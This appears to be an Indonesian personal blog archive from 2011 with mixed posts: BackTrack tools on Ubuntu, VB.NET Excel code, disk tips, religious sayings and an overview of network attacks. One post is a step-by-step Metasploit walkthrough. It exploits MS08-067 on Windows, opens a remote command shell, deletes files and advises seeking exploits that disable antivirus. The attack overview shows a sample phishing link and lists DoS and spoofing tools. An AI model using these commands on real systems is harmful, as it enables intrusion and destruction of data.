Tuesday, November 29, 2011

Install Backtrack 5 di Ubuntu 11.10

Bagi user yang menggunakan Ubuntu tetapi ingin belajar tentang IT/Network Security tidak perlu berpindah ke distro lain khususnya ke Backtrack karena aplikasi IT Security Backtrack 5 sudah bisa diinstall di Ubuntu.

Untuk menginstall Backtrack 5 di Ubuntu, lakukan langkah-langkah berikut :
1. Buka Terminal/Console
2. Masuk ke folder /etc/apt
    $ cd /etc/apt [enter]
3. Ketikkan perintah berikut untuk mengedit sources.list
    $ sudo gedit sources.list [enter]
4. Tambahkan repository Backtrack berikut ini :
     deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
      deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
      deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

5. Simpan dan keluar dari gedit.
6. Add Key dengan mengetikkan perintah berikut :
    $ wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add - [enter]

7. Ketikkan perintah berikut untuk mengupdate dan mengupgrade package.
    $ sudo apt-get update [enter]
    $ sudo apt-get upgrade [enter]

8. Terakhir, tinggal mengistall aplikasi Backtrack yang diinginkan.
     Misalnya : metasploit
    $ sudo apt-get install metasploit [enter]

Bisa juga menginstall melalui Ubuntu Software Center. 
1. Masuk ke Ubuntu Software Center
2. Search Metasploit
3. Klik Install
4. Selesai

OK. Selamat mencoba.

Monday, November 28, 2011

Hacking Windows dengan Metasploit

Artikel ini dimaksudkan untuk pembelajaran. Jangan digunakan untuk kegiatan yang melanggar hukum.
Sebagai seorang IT Administrator, tentunya memerlukan banyak tools untuk memastikan bahwa system yang dimanage aman. Dan sebagaimana yang saya sampaikan pada tulisan saya sebelumnya bahwa langkah terbaik untuk menjaga keamanan dan stabilitas system/network adalah dengan mengetahui jenis-jenis serangan yang biasa dilakukan oleh para craker.   

Pada artikel kali ini saya akan sharing mengenai hacking dengan menggunakan Metasploit. Metasploit adalah salah satu tools yang tersedia pada Linux BackTrack (Backtrack adalah OS yang biasa digunakan para hacker).

Dengan menggunakan Metasploit, seorang craker bisa masuk ke DOS windows, melihat-lihat isi hardisk bahkan bisa menghapus folder windows tersebut.  

Hal-hal yang harus disiapkan adalah :
  1.  1.  Satu buah PC atauNotebook dengan OS BackTrack atau jika kebetulan menggunakan Linux Ubuntu maka terpaksa harus menginstall terlebih dahulu tools Backtrack pada Ubuntu (Cara install BackTrack pada Ubuntu akan saya sampaikan dalam artikel yang berbeda. 
  2.       PC dengan OS WindowsKedua PC tersebut di atas harus terhubung dengan LAN.
Selanjutnya lakukan langkah-langkah berikut :
  1. Buka terminal/console
  2. Ketikkan nmap kemudian tekan enter$> nmap ip-target enter (ganti ip-target dengan ip number dari target PC
    Kemudian akan muncul gambar seperti di bawah ini.



Dari gambar di atas terlihat bahwa Port 135 di windows dari PC target statusnya Open, dan itu pertanda awal yang bagus. 

3.   Ketikkan msfconsole kemudian tekan enter
      $> msfconsole enter



Setelah menekan tombol enter, akan muncul window sebagai berikut :

 


4.  Ketikkan perintah berikut :

$> use windows/smb/ms08_067_netapi (enter)
$> set payloads windows/meterpreter/bind_tcp (enter)
$> set lhost 192.168.0.1 (enter, IP PC penyerang)
$> set rhost 192.168.0.2 (enter, IP PC target)
$> exploit (enter)

5. Jika setelah mengetikkan baris perintah diatas, muncul pesan seperti ini “Exploit completed, but no session was created”, berarti antivirus dari komputer target bekerja dengan baik. Carilah exploit yang bisa mematikan antivirus.

6.  Jika yang muncul adalah
     $> meterpreter berarti sukses.
7.  Lanjutkan dengan mengetikkan perintah berikut ini  
     $> execute –f cmd.exe –c -i

Coba ketikkan perintah DIR untuk melihat file dan folder-folder di windows. Untuk menghapus tinggak ketikkan DEL <nama file>

Terakhir, jika serangan exploit yang dilakukan di atas berhasil maka segera patch/update windowsnya serta update antivirusnya. Jangan lupa gunakan Antivirus yang bagus.   
Modul-modul exploit yang menggunakan metasploit bisa dipelajari pada link berikut : http://www.offensive-security.com/metasploit-unleashed/

Wednesday, November 23, 2011

Menyia-nyiakan Waktu

Imam Ibn al-Qayyim al-Jauziyyah berkata:
A’dham ar-rubhi fi ad-dunya an an tusyagghila nafsaka kulla waqtin bi ma huwa aula biha wa anfa’ fi ma’adiha (Keuntungan terbesar di dunia, jika anda menyibukkan diri setiap saat dengan perkara yang paling utama dan bermanfaat di hari akhirat anda). Lalu beliau berkata: Kaifa yakunu ‘aqilan man ba’a al-jannah bima fiha syahwata sa’ah (Bagaimana mungkin disebut orang berakal, jika dia bisa menjual surganya dengan kenikmatan sesaat)?  Maka katanya: Idha’at al-waqti asyaddu min al-maut. (Menyia-nyiakan waktu lebih dahsyat ketimbang mati. (Kitab al-Fawaid, hal 20)

Penyakit Hati

Ibnu al-Jauhi berkata : Ada 2 penyakit hati :
  1. Sakitnya tidak dirasakan seketika seperti bodoh, ragu, syubhat, syahwat dan malas… tidak terasa sakitnya ketika mendera, tapi setelah sekian lama baru terasa dan menyesal.
  2. Sakitnya dirasakan seketika seperti sedih dan benci….
 Wajar jika Nabi SAW berdo’a : Allahumma inni a’uddzubika min al-bukhli, wa al-hunzi, wa al-kasli, wa a’udzubika min ghalabat ad-dain wa qahri ar-rijal. (Ighatsah al-Lahfan Min Mashayid as-syaithan, Juz I, hal.18)

DELETE EFI PARTITION DI WINDOWS 7


Ketika akan memformat Hard Disk (HDD) di windows 7 dimana sebelumnya HDD tersebut telah diformat di MAC OS X maka  aka nada 1 partisi/volume HDD yang tidak bisa dihilangkan yakni partisi EFI. Jika kita right Click tombol mouse pada partisi tersebut, terlihat bahwa semua menu dalam kondisi disable seperti pada gambar di bawah ini.







                                                                                




Untuk mendelete EFI partition, lakukan langkah-langkah berikut :
  1. Sambungkan HDD yang berformat EFI tersebut ke komputer anda kemudian masuk ke Command   Prompt sebagai Administrator
          

2.   Ketikkan perintah diskpart kemudian tekan ENTER
      C:\windows\system32\diskpart 
3.   Ketikkan perintah list disk untuk melihat semua HDD yang terkoneksi ke PC
      DISKPART> list disk
4.   Ketikkan perintah select disk # 
      # adalah number disk yang akan dihapus partisi EFI nya
      DISKPART> select disk #
5.   Ketikkan perintah select partition #
      # adalah nomor partisi yang akan dihapus
      DISKPART> select partition # 
6.     Ketikkan perintah delete partition override

     DISKPART> delete partition override


7. Jika melihat pesan seperti pada gambar di atas berarti partisi EFI sudah berhasil dihapus

     
Semoga bermanfaat.

Monday, November 21, 2011

UPDATE FILE EXCEL DARI VB .NET 2010

Berikut ini adalah contoh coding untuk mengedit/mengupdate file Excel dari VB  2010.

Option Explicit On

Imports Excel = Microsoft.Office.Interop.Excel
Imports Microsoft.VisualBasic

Public Class Form1

    Private aEmployee As New List(Of clsEmployee) From _
         {New clsEmployee With {.Name = "ANTO", .GajiPokok = 5000000, _ 
                                .TTransport =  1000000,.TJabatan = 2000000,
                                .GajiTotal= "=D3+E3+F3", .AsuransiA = "=0.03*G3",_ 
                                .AsuransiB = "=0.02*G3", .Pinjaman = 200000, _ 
                                .TakeHomePay = "=G3-H3-I3-J3"},
          New clsEmployee With {.Name= "TOTO",.GajiPokok=5500000,.TTransport=1500000, _
                                .TJabatan = 3000000, .GajiTotal = "=D4+E4+F4", _
                                .AsuransiA = "=0.03*G4", .AsuransiB = "=0.02*G4", _ 
                                .Pinjaman = 300000, .TakeHomePay = "=G4-H4-I4-J4"},
          New clsEmployee With {.Name ="DINA",.GajiPokok=6000000,.TTransport=1000000, _
                                .TJabatan = 2000000, .GajiTotal = "=D5+E5+F5", _
                                .AsuransiA = "=0.03*G5", .AsuransiB = "=0.02*G5", _ 
                                .Pinjaman = 0, .TakeHomePay = "=G5+H5+I5+J5"},
          New clsEmployee With {.Name="WENY",.GajiPokok=3000000,.TTransport=500000, _
                                .TJabatan = 1000000, .GajiTotal = "=D6+E6+F6", _
                                .AsuransiA = "=0.03*G5", .AsuransiB = "=0.02*G5", _ 
                                .Pinjaman = 0, .TakeHomePay = "=G6+H6+I6+J6"}}

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim xlApp As Excel.Application
        Dim xlWBook As Excel.Workbook
        Dim xlSheet As Excel.Worksheet
        Dim sheetRange As Excel.Range
        Dim cRow As String
        Dim i As Integer


        xlApp = New Excel.Application
        xlWBook = xlApp.Workbooks.Open("c:\MyProject\Salary.xlsx")
        xlSheet = xlWBook.Worksheets("sheet1")

        Try

            For i = 0 To 3
                If i > 1 Then
                    cRow = Convert.ToString(i + 3)
                    sheetRange = xlSheet.Range("b" + cRow, "k" + cRow)
                    sheetRange.EntireRow.EntireRow.Insert()
                End If
                With xlSheet
                    .Cells(i + 3, 2) = i + 1
                    .Cells(i + 3, 3) = aEmployee(i).Name
                    .Cells(i + 3, 4) = aEmployee(i).GajiPokok
                    .Cells(i + 3, 5) = aEmployee(i).TTransport
                    .Cells(i + 3, 6) = aEmployee(i).TJabatan
                    .Cells(i + 3, 7) = aEmployee(i).GajiTotal
                    .Cells(i + 3, 8) = aEmployee(i).AsuransiA
                    .Cells(i + 3, 9) = aEmployee(i).AsuransiB
                    .Cells(i + 3, 10) = aEmployee(i).Pinjaman
                    .Cells(i + 3, 11) = aEmployee(i).TakeHomePay

                    If i = 3 Then
                        cRow = Convert.ToString(i + 3)
                        .Cells(i + 4, 3) = "GRAND TOTAL"
                        .Cells(i + 4, 4) = "=Sum(D3:D" + cRow + ")"
                        .Cells(i + 4, 5) = "=Sum(E3:E" + cRow + ")"
                        .Cells(i + 4, 6) = "=Sum(F3:F" + cRow + ")"
                        .Cells(i + 4, 7) = "=Sum(G3:G" + cRow + ")"
                        .Cells(i + 4, 8) = "=Sum(H3:H" + cRow + ")"
                        .Cells(i + 4, 9) = "=Sum(I3:I" + cRow + ")"
                        .Cells(i + 4, 10) = "=Sum(J3:J" + cRow + ")"
                        .Cells(i + 4, 11) = "=Sum(K3:K" + cRow + ")"
                    End If
                End With

            Next

            cRow = Convert.ToString(i + 3)
            sheetRange = xlSheet.Range("D3", "k" + cRow)
            sheetRange.NumberFormat = "#,##0_);[Red](#,##0)"

        Catch ex As Exception
           
        End Try


        xlWBook.Save()
        xlWBook.Close()
        xlApp.Quit()

        DeleteObject(xlApp)
        DeleteObject(xlWBook)
        DeleteObject(xlSheet)
    End Sub

    Private Sub DeleteObject(ByVal obj As Object)
        Try
            System.Runtime.InteropServices.Marshal.ReleaseComObject(obj)
            obj = Nothing
        Catch ex As Exception
            obj = Nothing
        Finally
            GC.Collect()
        End Try
    End Sub

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        End
    End Sub
End Class


Public Class clsEmployee
    Public Property Name As String = ""
    Public Property GajiPokok As Double = 0
    Public Property TTransport As Double = 0
    Public Property TJabatan As Double = 0
    Public Property GajiTotal As String = ""
    Public Property AsuransiA As String = ""
    Public Property AsuransiB As String = ""
    Public Property Pinjaman As Double = 0
    Public Property TakeHomePay As String = ""
End Class



Tampilan File Excel sebelum diupdate melalui VB 2010


Tampilan File Excel setelah diupdate melalui VB 2010



Semoga bermanfaat!

Friday, November 18, 2011

TIPS : Membaca Format HFS di Windows

Seperti kita ketahui bahwa secara default, windows hanya bisa membaca Harddisk dengan format NTFS, FAT32/FAT.

Misalnya windows tidak akan bisa membaca data Harddisk atau partisi dengan format HFS (MAC OS X). Jika kita mencoba meng-attach external HDD dengan format HFS kemudian kita coba cek ke Disk Management yang ada di Control Panel (Control Panel->Administrative Tools->Computer Management), maka akan terlihat seperti berikut ini:


 Dari gambar di atas terlihat bahwa External HDD yang berformat HFS bisa didetect oleh Windows tetapi volume/HDD tersebut tidak bisa di mount. Dengan demikian data dan informasi yang tersimpan di HDD tersebut tidak bisa terbaca.

Namun demikian, anda tidak perlu kuatir karena ada beberapa tools yang bisa digunakan untuk membaca data/partisi dari HDD yang menggunakan format HFS. Salah satu diantaranya adalah HFSExplorer. Download tools HFSExplorer di sini kemudian install di komputer anda. Oh ya... tools ini free sehingga anda tidak perlu kuatir terkena UU HAKI. 

Selanjutnya untuk membaca data dari external HDD yang menggunakan format HFS, lakukan langkah-langkah berikut :
1. Jalankan HFSExplorer.
2. Pilih menu File
3. Load File System From Device.


4. Kemudian klik tombol Load

Selanjutnya semua data dan informasi yang tersimpan pada external HDD tersebut akan muncul seperti pada gambar di bawah ini :


Kita dapat mengcopy file-file yang diperlukan dengan memilih file-file tersebut kemudian tekan tombol Extract.

Semoga bermanfaat terutama buat saya sendiri.

Tuesday, November 15, 2011

Muru'ah

Imam as-Syafii berkata, al-Muru'ah hiya 'iffatu al-jawarih 'amma la ya'nihi (muru'ah adalah menjaga kesucian anggota badan terhadap apa yang tidak berguna baginya) (al-Imam ar-Razi, Adab as-Syafii wa Manaqibuhu).

Monday, November 14, 2011

Revolution of Network Attack

Saya bukanlah seorang pakar keamanan jaringan. Juga bukan seorang hacker maupun cracker. Saya menulis hanya ingin berbagi tentang sedikit ilmu yang saya dapatkan ketika mengikuti training ‘Hacking and Network Security’.

Dari pengalaman sehari-hari sebagai seorang admin, seringkali saya melihat karyawan baik dia seorang IT maupun sebagai seorang end user tidak terlalu peduli dengan kesalahan konfigurasi pada system. Mereka menganggap itu adalah hal kecil, merupakan hal yang sepele. Padahal kesalahan konfigurasi pada system pada dasarnya adalah sebuah celah atau lubang keamanan yang bisa dimanfaatkan oleh seorang cracker untuk melakukan serangan terhadap system.

Oleh karena itu, baik seorang Admin System maupun Network ataupun seorang EndUser harus belajar dan mengetahui teknik-teknik penyerangan yang sering digunakan oleh seorang cracker. Tujuannya tentunya bukan untuk menyerang system tetapi untuk menghindari serangan yang akan dilakukan oleh cracker terhadap System/Jaringan. Mengetahui jenis serangan sangat penting untuk menjaga keamanan dan stabilitas system.

Lalu kenapa seorang end user juga penting untuk belajar dan mengetahui teknik-teknik serangan seorang cracker?. Karena bisa jadi System/Jaringan mempunyai pertahanan yang sangat kuat dan tidak bisa ditembus oleh seorang cracker dari luar. Nah dalam hal ini seorang cracker bisa saja menggunakan kelengahan dan keteledoran seorang end user untuk melakukan serangannya terhadap System/Jaringan. Karena banyak system/jaringan yang menerapkan Security yang sangat ketat untuk orang luar tetapi sangat longgar terhadap orang dalam/end user.

Dalam tulisan ini saya akan saya sampaikan jenis-jenis serangan yang sering oleh cracker karena dengan untuk bertahan, tentunya kita harus mengetahui cara menyerangnya.

A.   Traditional Attack

1.    Eaves Dropping or Network Sniffing.  

Serangan lapisan jaringan yang terdiri dari menangkap paket-paket ditransmisikan dari jaringan dengan komputer lain dan membaca isi data untuk mencari informasi sensitif seperti password, session token, membaca email, membaca file, membaca financial transcation dan segala jenis informasi yang sifatnya rahasia. Network Sniffing dapat dilakukan dengan menggunakan tools yang disebut Network Sniffers


  

 2. Man–in-the Middle Attack (MITM)

Adalah bentuk serangan dimana Cracker membuat koneksi  independen dengan komputer  target dan me-relay komunikasi di antara mereka, membuat mereka percaya bahwa mereka berbicara langsung satu sama lain, tapi sebenarnya seluruh percakapan telah dikendalikan oleh Cracker. Teknik hacking yang dilakukan dengan cara meracuni tabel ARP komputer dengan melakukan apa yang disebut arp spoof attack. Misalnya seorang cracker melakukan intercept terhadap transaksi TCP antara komputer dengan WebServer. Dalam hal ini attacker selanjutnya bertindak sebagai Proxy. Dengan demikian komputer client akan selalu mengirimkan data ke komputer cacker dan komputer cacker akan meneruskan data yang dikirim oleh client ke gateway. Dengan cara seperti itu maka cacker dapat mengetahui password dan id para pengguna computer .
 





Tools yang dapat digunakan untuk melakukan MITM attack diantaranya adalah Packet Creator, Ettercap, Dsniff. WebScarab (Proxy)

 
3. Identity Spoofing (IP Spoofing)
IP Spoofing adalah bentuk serangan yang memanfaatkan ketidakmampuan Protokol TCP/IP untuk memeriksa apakah sumber IP address dalam paket header benar-benar milik mesin yang mengirimkannya.

IP Spoofing adalah pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. IP Spoofing terjadi ketika seorang attacker mengakali packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Karena packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data.



 
Beberapa tools yang digunakan untuk IP Spoofing antara lain Engage Packet Builder v2.20, HPing v2.0.0, Colasoft Packet Builder v1.0, Colasoft Packet Player v1.1, PacketExcalibur v1.0.2 , Scapy v2.0.0.10, Spoofer v0.5, NMap v4.68 (for Windows OS)

LSRscan v1.0 , Scapy v2.0.0.10, Sendip v2.5-1, Spoofer v0.5, Yersina v0.7.1, HPing v2.0.0, IRPAS v0.8, LSRtunnel v0.2.1, NMap v4.76, PacketExcalibur v1.0.2  (for Linux OS)

4.    Password-Based Attack 
Password-Based Attack adalah bentuk serangan dimana seorang Cracker berusaha untuk menebak password untuk masuk ke dalam system atau jaringan.

Kelemahan utama dari suatu system yang keamanannya menggunakan ‘Password Based Control’ adalah bahwa kontrol kemanannya hanya didasarkan kepada UserID dan Password dan tidak bisa mengontrol siapa yang telah menggunakan UserID dan Password tersebut. Dengan kata lain, siapapun bisa masuk ke dalam system itu jika UserID dan Password yang digunakan itu Valid.

Pada beberapa aplikasi tidak mempunyai utility untuk memprotek informasi user id dan password. UserID dan Password dikirim dalam format plain text, tidak di enkrpsi. Hal ini akan memudahkan seorang cracker untuk mendapatkan UserID dan Password tersebut untuk kemudian menggunakannya untuk menyerang kedalam corporate network.

5. Denial-Of-Service Attack (DoS)

DoS Attack tidak ditujukan untuk mengumpulkan atau mengumpulkan data. DoS hanya ditujukan untuk mencegah akses terhadap services dari suatu network, computer atau aplikasi. Cracker yang melakukan serangan DoS attack bisa disebut sebagai orang yang frustasi karena tidak bisa menembus security dari suatu network.

DoS attack sering juga disebut sebagai stupid attack. Karena untuk melakukan serangan DoS, seorang cracker memerlukan resources yang sangat besar, seperti bandwidth. Dan tentunya ini juga akan membebani seorang cracker.

DoS attack bisa menggunakan salah satu metode berikut untuk mencegah akses terhadap services dari suaru jaringan, komputer, atau aplikasi:

  1. Membanjiri network dengan data yang tidak valid sampai traffic dari user yang akan  mengakses services dari network atau komputer atau aplikasi tidak dapat diproses. 
  2. Membanjiri network dengan service request yang akan menyebabkan service request dari user tidak dapat diproses lagi karena network tersebut sudah overload. 
  3. Mengganggu komunikasi antara host dan klien dengan cara merubah konfigurasi system, atau membuat crash router untuk mencegah user mengakses sistem.
Berikut ini adalah beberapa tools yang bisa digiunakan untuk melakukan DoS attack. Tools-tools ini bisa didapatkan dengan mudah di internet diantaranya:  
  • Bonk 
  • LAND 
  • Smurf 
  • Teardrop 
  • WinNuke
B. Modern Network Attack
Modern Network attack terdiri dari :
  1.  Social Network Attack
Mengapa? Karena bisa dipastikan bahwa sebagian besar Admin dari suatu system juga menggunakan Social Media baik itu facebook maupun twitter, sementara itu seorang cracker akan menggunakan segala cara yang mendapatkan infomasi yang berharga – misalnya Enterprise data. Seorang cracker bisa menggunakan Cross site scripting atau cross site request forgery.

Seorang cracker bisa membuat script dengan memanfaatkan fitur script yang ada di facebook untuk membuat aplikasi jahat dengan tujuan mengelabui seorang user. Maka tidak heran kemudian banyak orang yang tidak merasa bahwa account facebook mereka telah dihack. Bayangkan jika account facebook tersebut adalah account seorang admin suatu system.


Sebagai contoh, perhatikan link berikut yang bisa saja dikirim oleh seorang teman dari facebook.

Wall :

Hey, ini adalah foto saya sedang mandi. Please chekidot.
http://facebook.com.0120320320320.tk

Seorang user yang tidak aware, mungkin akan langsung mengklik link tersebut karena mengira bahwa link itu dari facebook dan dikirim oleh temannya. Maka link tersebut pasti aman. Padahal sesungguhnya link tersebut di atas bukan dari facebook, tetapi begitu link itu di klik maka user akan diarahkan ke website yang berisi kode jahat yang akan mencuri informasi-informasi penting seperti UserID dan password. 

Seorang cracker juga bisa memanfaatkan fitur notifikasi dari facebook atapun twitter untuk melakukan serangan DoS (Denial of Service) dengan cara membuat script jahat untuk menuliskan 'comment' pada 'Wall' secara otomatis dan jika fitur notifikasi diaktifkan oleh user tersebut maka facebook akan mengirimkan pesan notifikasi kepada user secara terus-menerus. Dan jika user tersebut menggunakan email corporate untuk registrasi ke facebook atau twitter, kondisi ini akan membuat server email corporate menjadi 'sangat sibuk' dan akhirnya menjadi stack, dan hang

2.    SSL Attack
Ternyata SSL maupun TLS sudah mulai tidak aman lagi dari serangan para cracker. Oleh karena itu komunitas keamanan jaringan sedang bekerja bersama-sama untuk mencari pengganti dari SSL. Serangan terhadap SSL yang disebut BEAST (Browser exploit Against SSL/TLS).   

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews